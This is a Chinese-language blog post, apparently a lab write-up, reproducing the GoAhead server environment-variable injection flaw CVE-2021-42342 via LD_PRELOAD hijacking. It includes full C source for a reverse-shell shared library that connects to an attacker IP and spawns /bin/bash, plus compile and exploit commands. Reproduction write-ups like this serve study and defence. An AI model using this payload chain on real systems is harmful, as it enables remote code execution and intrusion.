首页 > 其他分享> > GoAhead Server 环境变量注入（CVE-2021-42342）

GoAhead Server 环境变量注入（CVE-2021-42342）

2022-05-16 08:02:59 作者：互联网

GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server，多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。

这个漏洞是CVE-2017-17562漏洞补丁的绕过，攻击者可以利用该补丁没有考虑到的multipart表单控制目标服务器的环境变量，进而劫持LD_PRELOAD来执行任意代码。

参考链接：

漏洞环境

执行如下命令启动GoAhead 5.1.4：

docker-compose up -d

启动完成后，访问http://your-ip:8080/即可看到欢迎页面。访问http://your-ip:8080/cgi-bin/index即可查看到Hello页面，即为CGI执行的结果。

漏洞复现

（1）打印测试内容

编写打印测试文件的poc代码如下（poc.c）：

#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World\r\n\r\n", 16);
    write(1, "Hacked\n", 7);
}

这样，before_main函数将在程序执行前被调用。编译以上代码：

gcc -s -shared -fPIC ./poc.c -o payload.so

然后，我们使用这个脚本来发送恶意数据包，复现漏洞：

python3 poc.py http://target-ip:8080/cgi-bin/index payload.so

可见，我们在动态链接库中编写的劫持代码已经被成功执行：

（2）反弹Shell

反弹shell的poc代码如下（shell.c）：

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="192.168.75.150";
uint32_t server_port=9999;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

使用如下命令编译以上代码：

gcc -s -shared -fPIC ./shell.c -o shell.so

在对应的ip端口上开启监听

执行payload，此时脚本可能会报错，但没有影响

python3 poc.py http://target-ip:8080/cgi-bin/index shell.so

成功触发RCE：

标签：shell,addr,ip,42342,Server,attacker,poc,2021,void
来源： https://www.cnblogs.com/NoCirc1e/p/16275592.html